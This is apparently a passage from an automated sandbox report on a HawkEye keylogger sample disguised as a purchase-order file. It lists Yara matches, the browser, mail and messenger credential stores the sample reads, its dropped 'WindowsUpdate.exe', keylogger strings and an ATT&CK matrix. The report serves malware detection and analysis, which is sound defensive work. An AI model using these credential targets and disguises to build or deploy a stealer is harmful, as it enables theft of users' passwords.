              Source: Yara matchFile source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE
              Yara detected MailPassViewShow sources
              Source: Yara matchFile source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6084, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara matchFile source: 2.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to steal Instant Messenger accounts or passwordsShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword2_2_00402D9A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword2_2_00402D9A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword2_2_004033D7
              Yara detected WebBrowserPassView password recovery toolShow sources
              Source: Yara matchFile source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 968, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Detected HawkEye RatShow sources
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeString found in binary or memory: HawkEyeKeylogger
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmpString found in binary or memory: kr'&HawkEye_Keylogger_Execution_Confirmed_
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmpString found in binary or memory: kr#"HawkEye_Keylogger_Stealer_Records_
              Source: WindowsUpdate.exeString found in binary or memory: HawkEyeKeylogger
              Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
              Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
              Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
              Source: WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Source: WindowsUpdate.exeString found in binary or memory: HawkEyeKeylogger
              Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
              Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
              Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_1AEB0F6E bind,8_2_1AEB0F6E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_1AEB0B5E listen,8_2_1AEB0B5E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_1AEB0B20 listen,8_2_1AEB0B20
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_1AEB0F3B bind,8_2_1AEB0F3B
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_1EFB0B5E listen,11_2_1EFB0B5E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_1EFB1096 bind,11_2_1EFB1096
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_1EFB1063 bind,11_2_1EFB1063
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_1EFB0B20 listen,11_2_1EFB0B20

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Replication Through Removable Media1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API11Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture211Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsShared Modules1Registry Run Keys / Startup Folder1Process Injection411Obfuscated Files or Information3Credentials in Registry2Account Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Software Packing11Credentials In Files1File and Directory Discovery1Distributed Component Object ModelInput Capture211Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery38SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsSecurity Software Discovery161VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion3DCSyncVirtualization/Sandbox Evasion3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection411Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 341532 Sample: PO 2010029_pdf    Quotation... Startdate: 19/01/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->40 42 11 other signatures 2->42 6 PO 2010029_pdf    Quotation  from Alibaba Ale.exe 16 8 2->6         started        11 WindowsUpdate.exe 5 2->11         started        13 WindowsUpdate.exe 4 2->13         started        process3 dnsIp4 30 whatismyipaddress.com 104.16.155.36, 49709, 80 CLOUDFLARENETUS United States 6->30 32 192.168.2.1 unknown unknown 6->32 24 C:\Users\user\AppData\...\WindowsUpdate.exe, PE32 6->24 dropped 26 C:\...\WindowsUpdate.exe:Zone.Identifier, ASCII 6->26 dropped 44 Changes the view of files in windows explorer (hidden files and folders) 6->44 46 Writes to foreign memory regions 6->46 48 Allocates memory in foreign processes 6->48 54 3 other signatures 6->54 15 vbc.exe 1 6->15         started        18 vbc.exe 13 6->18         started        20 WerFault.exe 3 9 6->20         started        22 dw20.exe 22 6 6->22         started        34 127.0.0.1 unknown unknown 11->34 28 C:\Users\user\...\WindowsUpdate.exe.log, ASCII 11->28 dropped 50 Multi AV Scanner detection for dropped file 11->50 52 Machine Learning detection for dropped file 11->52 file5 signatures6 process7 signatures8 56 Tries to steal Mail credentials (via file registry) 15->56 58 Tries to steal Instant Messenger accounts or passwords 15->58 60 Tries to steal Mail credentials (via file access) 15->60 62 Tries to harvest and steal browser information (history, passwords, etc) 18->62

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PO 2010029_pdf Quotation from Alibaba Ale.exe37%ReversingLabsWin32.Backdoor.NanoBot
              PO 2010029_pdf Quotation from Alibaba Ale.exe100%Joe Sandbox ML

